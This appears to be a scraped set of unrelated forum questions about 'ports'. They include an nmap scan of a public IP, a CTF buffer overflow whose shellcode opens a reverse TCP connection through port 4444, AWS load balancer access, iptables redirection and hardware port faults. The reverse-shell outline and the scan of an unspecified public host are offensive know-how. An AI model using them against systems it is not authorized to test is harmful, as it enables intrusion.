Port Scanning: Question about next steps after Zenmap port scan

I am very new to offensive security.

I have done an nmap scan on a public IP; it's showing 4 ports open and the OS is undetectable. I have no idea how to proceed further. I would appreciate any next steps in this case. Below is a snippet from the nmap output:

Not shown: 995 closed ports
PORT     STATE    SERVICE      VERSION
25/tcp   filtered smtp
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
6009/tcp filtered X11:9
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: ISS Proventia GX3002 firewall (Linux 2.4.18) (97%), Linux 2.6.22 (Debian 4.0) (97%), CMI Genus NEMA terminal (95%), D-Link DGS-1210 switch (95%), D-Link DI-604 wireless broadband router (95%), Efficient Networks SpeedStream 4100 ADSL router (95%), FreeBSD 6.1-RELEASE (95%), IBM i 6.1 (95%), Cobalt Qube 2700WG (Linux 2.0.34) (95%), Linux 2.4.20 (95%)
No exact OS matches for host (test conditions non-ideal).

Reverse TCP – Bind to a specific port

So, I’m trying to solve a CTF challenge that involves exploiting a remote service. The service doesn’t check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the program closes the connection. So, I’m trying to have my shellcode connect back to me. A small hurdle is that the server allows outbound connections only through port 4444. So, my shellcode does the following:

  1. socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  2. bind(socket_fd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16)
  3. connect(socket_fd, {sa_family=AF_INET, sin_port=htons(port_no), sin_addr=inet_addr("ip")}, 16)

I am trying to get a reverse TCP session and I believe by binding to port 4444 the outbound connection will go through 4444. While the exploit works on my local system, the remote exploit does not work. Any thoughts on what I’m missing or what I should be considering? Thanks!

How can I give a network load balancer (of any type) access to a port on a machine without opening that port to an entire VPC?

Is it possible to make an AWS load balancer for a non-HTTP port allowed to access a specific port on a host without opening that port to the entire VPC’s subnet? I seem to remember reading that this might be possible with an IAM policy based around specific resources or something like that.

As you create a non-classic network load balancer it says: “The security groups for your instances must allow traffic from the VPC CIDR on the health check port.”

Which is ok, but just barely since this service really doesn’t have much/any authentication.

Isn’t there a way this can be done with IAM permissions instead of a security group? I was reading about AWS firewall security somewhere and they mentioned that sometimes you can use an IAM policy, sometimes even a cross-account IAM policy to connect to the machines behind the firewall.

Any suggestions? I can definitely deploy more machines or AWS stuff.

How to redirect a port range on a load balancer

I’m a little new to this and trying to figure this out. I have 3 web servers running Ubuntu 16.04 and Apache2. One of the web servers will serve as a load balancer for the other two. I have the load balancing part correct, but I am trying to set this up where the port range 60000-65000 on the load balancer is redirected to the web servers on port 80. My guess is that this is done using iptables but that’s just a guess. Has anyone implemented this before? Thanks in advance.

Ethernet port missing in Jetson TX2

I have a Connect Tech Rudi TX2 device that came with Ubuntu 16.04 installed and it had two physical Ethernet ports eth0 and eth1 (they also worked).

After upgrading the Jetson platform to a newer version and flashing Connect Tech’s BSP there’s now only one Ethernet interface visible when I run ifconfig.

Is there a config file somewhere where you can enable or disable network interfaces?

Edit: The other Ethernet port is not enabled in the sense it seems to be completely dead, not just a /etc/network/interfaces thing.

suddenly my hdmi port stopped working

Suddenly my HDMI port stopped working when I tried
$ xrandr
Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 8192 x 8192
eDP-1 connected primary 1920×1080+0+0 (normal left inverted right x axis y axis) 309mm x 173mm
1920×1080 60.01*+ 60.01 59.97 59.96 59.93 48.01
1680×1050 59.95 59.88
1600×1024 60.17
1400×1050 59.98
1600×900 59.99 59.94 59.95 59.82
1280×1024 60.02
1440×900 59.89
1400×900 59.96 59.88
1280×960 60.00
1440×810 60.00 59.97
1368×768 59.88 59.85
1360×768 59.80 59.96
1280×800 59.99 59.97 59.81 59.91
1152×864 60.00
1280×720 60.00 59.99 59.86 59.74
1024×768 60.04 60.00
960×720 60.00
928×696 60.05
896×672 60.01
1024×576 59.95 59.96 59.90 59.82
960×600 59.93 60.00
960×540 59.96 59.99 59.63 59.82
800×600 60.00 60.32 56.25
840×525 60.01 59.88
864×486 59.92 59.57
800×512 60.17
700×525 59.98
800×450 59.95 59.82
640×512 60.02
720×450 59.89
700×450 59.96 59.88
640×480 60.00 59.94
720×405 59.51 58.99
684×384 59.88 59.85
680×384 59.80 59.96
640×400 59.88 59.98
576×432 60.06
640×360 59.86 59.83 59.84 59.32
512×384 60.00
512×288 60.00 59.92
480×270 59.63 59.82
400×300 60.32 56.34
432×243 59.92 59.57
320×240 60.05
360×202 59.51 59.13
320×180 59.84 59.32
DP-1 disconnected (normal left inverted right x axis y axis)
HDMI-1 disconnected (normal left inverted right x axis y axis)

Tried to reboot and check but it didn’t work.